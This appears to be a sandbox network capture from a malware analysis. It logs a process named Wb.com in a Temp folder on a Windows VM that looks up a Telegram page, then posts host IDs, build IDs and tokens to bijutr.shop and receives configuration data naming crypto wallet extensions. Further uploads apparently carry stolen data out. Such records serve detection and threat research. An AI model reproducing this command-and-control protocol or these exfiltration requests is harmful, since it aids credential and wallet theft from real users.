                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:54.824682951 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:54.824727058 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:54.824820042 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:54.824965000 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:54.831729889 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:55.146281958 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:55.153130054 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:55.153553009 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:55.153554916 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:55.153729916 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:55.153739929 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:55.190366030 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:55.492034912 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:01.113564014 CET64620443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:01.113706112 CET64620443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:01.113888979 CET64620443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:01.113964081 CET64620443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:01.981511116 CET64620443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:01.981615067 CET64620443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.264044046 CET44364620172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.264642000 CET64620443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.297246933 CET44364620172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.297269106 CET44364620172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.297271013 CET64620443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.297278881 CET44364620172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.297314882 CET44364620172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.297641039 CET64620443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.297744036 CET64620443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.297866106 CET64620443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.298969984 CET44364620172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.299135923 CET44364620172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.299684048 CET64620443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.563328028 CET64620443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.579036951 CET44364620172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.609823942 CET64620443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.613871098 CET44364620172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.613893986 CET44364620172.64.41.3192.168.2.6
| Timestamp | Source IP | Dest IP | Checksum | Code | Type |
|---|---|---|---|---|---|
| Dec 23, 2024 17:15:04.657156944 CET | 192.168.2.6 | 1.1.1.1 | c29d | (Port unreachable) | Destination Unreachable |
Session ID | Source IP | Source Port | Destination IP | Destination Port
0 | 192.168.2.6 | 49709 | 20.198.119.84 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:14:04 UTC | 71 | OUT
                                                                                                                                                                                                                                                                                                      Data Ascii: CNT 1 CON 305MS-CV: tG0IiaJ8l0W5rKu1.1Context: 7d5c2dd7fe5ec31f
2024-12-23 16:14:04 UTC | 249 | OUT
                                                                                                                                                                                                                                                                                                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-23 16:14:04 UTC | 1084 | OUT
                                                                                                                                                                                                                                                                                                      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: tG0IiaJ8l0W5rKu1.2Context: 7d5c2dd7fe5ec31f<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAASCcqGbYtW4oKbxzGSqvLDvBPO/som3OdOCEAm9/gZL0Gd4xSQR3BK1kJh297wK4+JR/VnXdpoTbzd5wtUgDE4PeJtB4lLC3XJWpkcKBa5Yejk
2024-12-23 16:14:04 UTC | 218 | OUT
                                                                                                                                                                                                                                                                                                      Data Ascii: BND 3 CON\WNS 0 197MS-CV: tG0IiaJ8l0W5rKu1.3Context: 7d5c2dd7fe5ec31f<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-23 16:14:05 UTC | 14 | IN
                                                                                                                                                                                                                                                                                                      Data Ascii: 202 1 CON 58
2024-12-23 16:14:05 UTC | 58 | IN
                                                                                                                                                                                                                                                                                                      Data Ascii: MS-CV: 5LPcxLUiTU6FXs+unzhx8g.0Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port
1 | 192.168.2.6 | 49726 | 20.198.119.84 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:14:16 UTC | 71 | OUT
                                                                                                                                                                                                                                                                                                      Data Ascii: CNT 1 CON 305MS-CV: x9beX5fZNUWJFwKN.1Context: 70d63a602fea2486
2024-12-23 16:14:16 UTC | 249 | OUT
                                                                                                                                                                                                                                                                                                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-23 16:14:16 UTC | 1084 | OUT
                                                                                                                                                                                                                                                                                                      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: x9beX5fZNUWJFwKN.2Context: 70d63a602fea2486<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAASCcqGbYtW4oKbxzGSqvLDvBPO/som3OdOCEAm9/gZL0Gd4xSQR3BK1kJh297wK4+JR/VnXdpoTbzd5wtUgDE4PeJtB4lLC3XJWpkcKBa5Yejk
2024-12-23 16:14:16 UTC | 218 | OUT
                                                                                                                                                                                                                                                                                                      Data Ascii: BND 3 CON\WNS 0 197MS-CV: x9beX5fZNUWJFwKN.3Context: 70d63a602fea2486<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-23 16:14:17 UTC | 14 | IN
                                                                                                                                                                                                                                                                                                      Data Ascii: 202 1 CON 58
2024-12-23 16:14:17 UTC | 58 | IN
                                                                                                                                                                                                                                                                                                      Data Ascii: MS-CV: 22YQpYVr70y0QqOfOk5leg.0Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49752 | 149.154.167.99 | 443 | 2744 | C:\Users\user\AppData\Local\Temp\623615\Wb.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:14:26 UTC | 85 | OUT | GET /k04ael HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: t.me
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
2024-12-23 16:14:26 UTC | 511 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:14:26 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                      Content-Length: 12298
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Set-Cookie: stel_ssid=84286bb816d85d4714_7163457332475443617; expires=Tue, 24 Dec 2024 16:14:26 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                      Cache-control: no-store
                                                                                                                                                                                                                                                                                                      X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=35768000
2024-12-23 16:14:26 UTC | 12298 | IN
                                                                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @k04ael</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


Session ID | Source IP | Source Port | Destination IP | Destination Port
3 | 192.168.2.6 | 49757 | 20.198.119.84 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:14:29 UTC | 71 | OUT
                                                                                                                                                                                                                                                                                                      Data Ascii: CNT 1 CON 305MS-CV: 5iL7jeZnaEuCcaFc.1Context: ac9f2df651061843
2024-12-23 16:14:29 UTC | 249 | OUT
                                                                                                                                                                                                                                                                                                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-23 16:14:29 UTC | 1084 | OUT
                                                                                                                                                                                                                                                                                                      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 5iL7jeZnaEuCcaFc.2Context: ac9f2df651061843<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAASCcqGbYtW4oKbxzGSqvLDvBPO/som3OdOCEAm9/gZL0Gd4xSQR3BK1kJh297wK4+JR/VnXdpoTbzd5wtUgDE4PeJtB4lLC3XJWpkcKBa5Yejk
2024-12-23 16:14:29 UTC | 218 | OUT
                                                                                                                                                                                                                                                                                                      Data Ascii: BND 3 CON\WNS 0 197MS-CV: 5iL7jeZnaEuCcaFc.3Context: ac9f2df651061843<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-23 16:14:29 UTC | 14 | IN
                                                                                                                                                                                                                                                                                                      Data Ascii: 202 1 CON 58
2024-12-23 16:14:29 UTC | 58 | IN | Data Raw: 4d 53 2d 43 56 3a 20 4b 53 69 54 35 73 45 73 75 6b 61 72 51 67 37 50 4d 50 74 34 31 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                      Data Ascii: MS-CV: KSiT5sEsukarQg7PMPt41A.0Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49759 | 188.245.216.205 | 443 | 2744 | C:\Users\user\AppData\Local\Temp\623615\Wb.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:14:29 UTC | 231 | OUT | GET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
2024-12-23 16:14:29 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:14:29 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
2024-12-23 16:14:29 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49765 | 188.245.216.205 | 443 | 2744 | C:\Users\user\AppData\Local\Temp\623615\Wb.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:14:31 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----ZM790RIWTRQIE37YCBIM
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                                      Content-Length: 256
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
2024-12-23 16:14:31 UTC | 256 | OUT | Data Ascii: ------ZM790RIWTRQIE37YCBIMContent-Disposition: form-data; name="hwid"356025B322603810289448-a33c7340-61ca------ZM790RIWTRQIE37YCBIMContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------ZM790RIWTRQIE37YCBIM--
2024-12-23 16:14:32 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:14:31 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
2024-12-23 16:14:32 UTC | 69 | IN | Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 61 36 65 32 32 65 66 39 63 35 37 35 34 65 63 66 38 32 31 31 39 33 36 65 64 31 33 62 64 38 37 30 7c 31 7c 31 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 3a1|1|1|1|a6e22ef9c5754ecf8211936ed13bd870|1|1|1|1|0|50000|10


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49771 | 188.245.216.205 | 443 | 2744 | C:\Users\user\AppData\Local\Temp\623615\Wb.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:14:33 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----DJMYUAAS26FUAAS0HVS0
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
2024-12-23 16:14:33 UTC | 331 | OUT | Data Ascii: ------DJMYUAAS26FUAAS0HVS0Content-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------DJMYUAAS26FUAAS0HVS0Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------DJMYUAAS26FUAAS0HVS0Cont
2024-12-23 16:14:34 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:14:34 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
2024-12-23 16:14:34 UTC | 2192 | IN | Data: base64-encoded response body


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49777 | 188.245.216.205 | 443 | 2744 | C:\Users\user\AppData\Local\Temp\623615\Wb.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:14:35 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----LFKFUSJMYMYU37G4W4EK
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
2024-12-23 16:14:35 UTC | 331 | OUT | Data Ascii: ------LFKFUSJMYMYU37G4W4EKContent-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------LFKFUSJMYMYU37G4W4EKContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------LFKFUSJMYMYU37G4W4EKCont
2024-12-23 16:14:36 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:14:36 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
2024-12-23 16:14:36 UTC | 5837 | IN | Data: base64-encoded response body


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49784 | 188.245.216.205 | 443 | 2744 | C:\Users\user\AppData\Local\Temp\623615\Wb.com

Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:14:38 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----ZM790RIWTRQIE37YCBIM
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 332
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 16:14:38 UTC | 332 | OUT | Data Ascii: ------ZM790RIWTRQIE37YCBIMContent-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------ZM790RIWTRQIE37YCBIMContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------ZM790RIWTRQIE37YCBIMCont
2024-12-23 16:14:39 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 16:14:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 16:14:39 UTC | 119 | IN | Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 49790 | 188.245.216.205 | 443 | 2744 | C:\Users\user\AppData\Local\Temp\623615\Wb.com

Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:14:40 UTC | 324 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----VKXT2NYUK6FU3ECBA1VA
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 6781
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 16:14:40 UTC | 6781 | OUT | Data Ascii: ------VKXT2NYUK6FU3ECBA1VAContent-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------VKXT2NYUK6FU3ECBA1VAContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------VKXT2NYUK6FU3ECBA1VACont
2024-12-23 16:14:41 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 16:14:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 16:14:41 UTC | 12 | IN | Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.6 | 49793 | 188.245.216.205 | 443 | 2744 | C:\Users\user\AppData\Local\Temp\623615\Wb.com

Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:14:41 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----R9ZMGDBAS0ZUAIMGLN7Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 489
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 16:14:41 UTC | 489 | OUT | Data Ascii: ------R9ZMGDBAS0ZUAIMGLN7QContent-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------R9ZMGDBAS0ZUAIMGLN7QContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------R9ZMGDBAS0ZUAIMGLN7QCont
2024-12-23 16:14:42 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 16:14:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 16:14:42 UTC | 12 | IN | Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port
11 | 192.168.2.6 | 49798 | 20.198.119.84 | 443

Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:14:44 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305MS-CV: ujuGUEFDsEqtLSR1.1Context: 2a7b2ab103f02655
2024-12-23 16:14:44 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-23 16:14:44 UTC | 1084 | OUT | Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: ujuGUEFDsEqtLSR1.2Context: 2a7b2ab103f02655<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAASCcqGbYtW4oKbxzGSqvLDvBPO/som3OdOCEAm9/gZL0Gd4xSQR3BK1kJh297wK4+JR/VnXdpoTbzd5wtUgDE4PeJtB4lLC3XJWpkcKBa5Yejk
2024-12-23 16:14:44 UTC | 218 | OUT | Data Ascii: BND 3 CON\WNS 0 197MS-CV: ujuGUEFDsEqtLSR1.3Context: 2a7b2ab103f02655<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-23 16:14:44 UTC | 14 | IN | Data Ascii: 202 1 CON 58
2024-12-23 16:14:44 UTC | 58 | IN | Data Ascii: MS-CV: oIGgJQya10S+SK/E8HTsFg.0Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.6 | 49805 | 172.217.21.36 | 443 | 5648 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:14:44 UTC | 595 | OUT | GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
Host: www.google.com
Connection: keep-alive
X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-12-23 16:14:45 UTC | 1266 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 16:14:44 GMT
Pragma: no-cache
Expires: -1
Cache-Control: no-cache, must-revalidate
Content-Type: text/javascript; charset=UTF-8
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-wnsYMZoTGJVqvUZM398Nag' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
Accept-CH: Sec-CH-Prefers-Color-Scheme
Accept-CH: Sec-CH-UA-Form-Factors
Accept-CH: Sec-CH-UA-Platform
Accept-CH: Sec-CH-UA-Platform-Version
Accept-CH: Sec-CH-UA-Full-Version
Accept-CH: Sec-CH-UA-Arch
Accept-CH: Sec-CH-UA-Model
Accept-CH: Sec-CH-UA-Bitness
Accept-CH: Sec-CH-UA-Full-Version-List
Accept-CH: Sec-CH-UA-WoW64
Permissions-Policy: unload=()
Content-Disposition: attachment; filename="f.txt"
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      13192.168.2.649806172.217.21.364435648C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:44 UTC498OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
2024-12-23 16:14:45 UTC | 1018 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Version: 705503573
                                                                                                                                                                                                                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Form-Factors
